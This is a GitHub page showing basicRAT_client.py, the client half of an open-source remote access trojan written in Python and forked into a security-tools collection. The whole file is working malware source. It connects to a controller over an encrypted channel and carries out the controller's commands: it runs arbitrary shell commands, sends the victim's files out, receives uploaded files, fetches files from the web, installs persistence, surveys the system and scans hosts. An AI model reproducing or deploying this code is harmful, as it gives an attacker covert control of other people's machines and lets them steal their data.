forked from awesome-security/basicRAT
-
Notifications
You must be signed in to change notification settings - Fork 13
/
basicRAT_client.py
executable file
·114 lines (90 loc) · 2.96 KB
/
basicRAT_client.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# basicRAT client
# https://github.com/vesche/basicRAT
#
import socket
import subprocess
import struct
import sys
from core import common
from core import crypto
from core import filesock
from core import persistence
from core import scan
from core import survey
from core import toolkit
PLAT_TYPE = sys.platform
HOST = 'localhost'
PORT = 1337
FB_KEY = '82e672ae054aa4de6f042c888111686a'
# generate your own key with...
# python -c "import binascii, os; print(binascii.hexlify(os.urandom(16)))"
def main():
s = socket.socket()
s.connect((HOST, PORT))
dh_key = crypto.diffiehellman(s)
GCM = crypto.AES_GCM(dh_key)
IV = 0
s.setblocking(0)
while True:
#data = s.recv(1024)
#data = crypto.AES_decrypt(data, dh_key)
data = crypto.recvGCM(s, GCM)
IV += 1
if not data:
continue
# seperate prompt into command and action
cmd, _, action = data.partition(' ')
# stop client
if cmd == 'kill':
s.close()
sys.exit(0)
# run command
elif cmd == 'execute':
results = subprocess.Popen(action, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
crypto.sendGCM(s, GCM, IV, results)
# send file
elif cmd == 'download':
for fname in action.split():
fname = fname.strip()
filesock.sendfile(s, GCM, fname)
# receive file
elif cmd == 'upload':
for fname in action.split():
fname = fname.strip()
filesock.recvfile(s, GCM, IV, fname)
# regenerate DH key
elif cmd == 'rekey':
dh_key = crypto.diffiehellman(s)
# apply persistence mechanism
elif cmd == 'persistence':
results = persistence.run(PLAT_TYPE)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
# download a file from the web
elif cmd == 'wget':
results = toolkit.wget(action)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
# unzip a file
elif cmd == 'unzip':
results = toolkit.unzip(action)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
# run system survey
elif cmd == 'survey':
results = survey.run(PLAT_TYPE)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
# run a scan
elif cmd == 'scan':
results = scan.single_host(action)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
if __name__ == '__main__':
main()